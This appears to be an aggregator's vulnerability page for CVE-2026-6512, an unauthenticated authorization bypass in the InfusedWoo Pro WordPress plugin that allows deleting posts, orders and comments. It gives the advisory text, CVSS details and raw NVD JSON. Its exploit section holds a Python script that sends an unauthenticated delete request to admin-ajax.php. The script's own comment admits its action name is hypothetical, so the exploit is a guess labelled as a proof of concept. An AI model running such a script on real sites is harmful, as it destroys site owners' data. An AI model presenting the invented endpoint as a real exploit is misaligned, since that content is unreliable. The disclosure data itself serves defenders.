Security Vulnerability Report
中文
CVE-2026-6512 CVSS 9.1 CRITICAL

CVE-2026-6512

Published: 2026-05-14 09:16:28
Last Modified: 2026-05-14 14:28:41

Description

The InfusedWoo Pro plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 5.1.2. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to permanently delete arbitrary posts, pages, products, or orders, mass-delete all comments on any post, and change any post's status.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

InfusedWoo Pro <= 5.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit(target_url, post_id): # Target endpoint typically is admin-ajax.php for WP plugins url = f"{target_url}/wp-admin/admin-ajax.php" # Payload based on the described vulnerability behavior # Specific action name 'infusedwoo_delete_item' is hypothetical as source code is closed payload = { "action": "infusedwoo_delete_item", "id": post_id, "type": "post" } # Sending unauthenticated request response = requests.post(url, data=payload) if response.status_code == 200: print(f"[+] Request sent to {url}. Check if post {post_id} is deleted.") print(f"[+] Server response: {response.text[:100]}") else: print(f"[-] Exploit failed with status code: {response.status_code}") if __name__ == "__main__": target = "http://example.com" exploit(target, 1)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6512", "sourceIdentifier": "[email protected]", "published": "2026-05-14T09:16:27.883", "lastModified": "2026-05-14T14:28:41.283", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The InfusedWoo Pro plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 5.1.2. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to permanently delete arbitrary posts, pages, products, or orders, mass-delete all comments on any post, and change any post's status."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://downloads.infusedwoo.com/updater/iw5.php?changelog", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f624c9a0-b48f-49f5-ba63-276805904945?source=cve", "source": "[email protected]"}]}}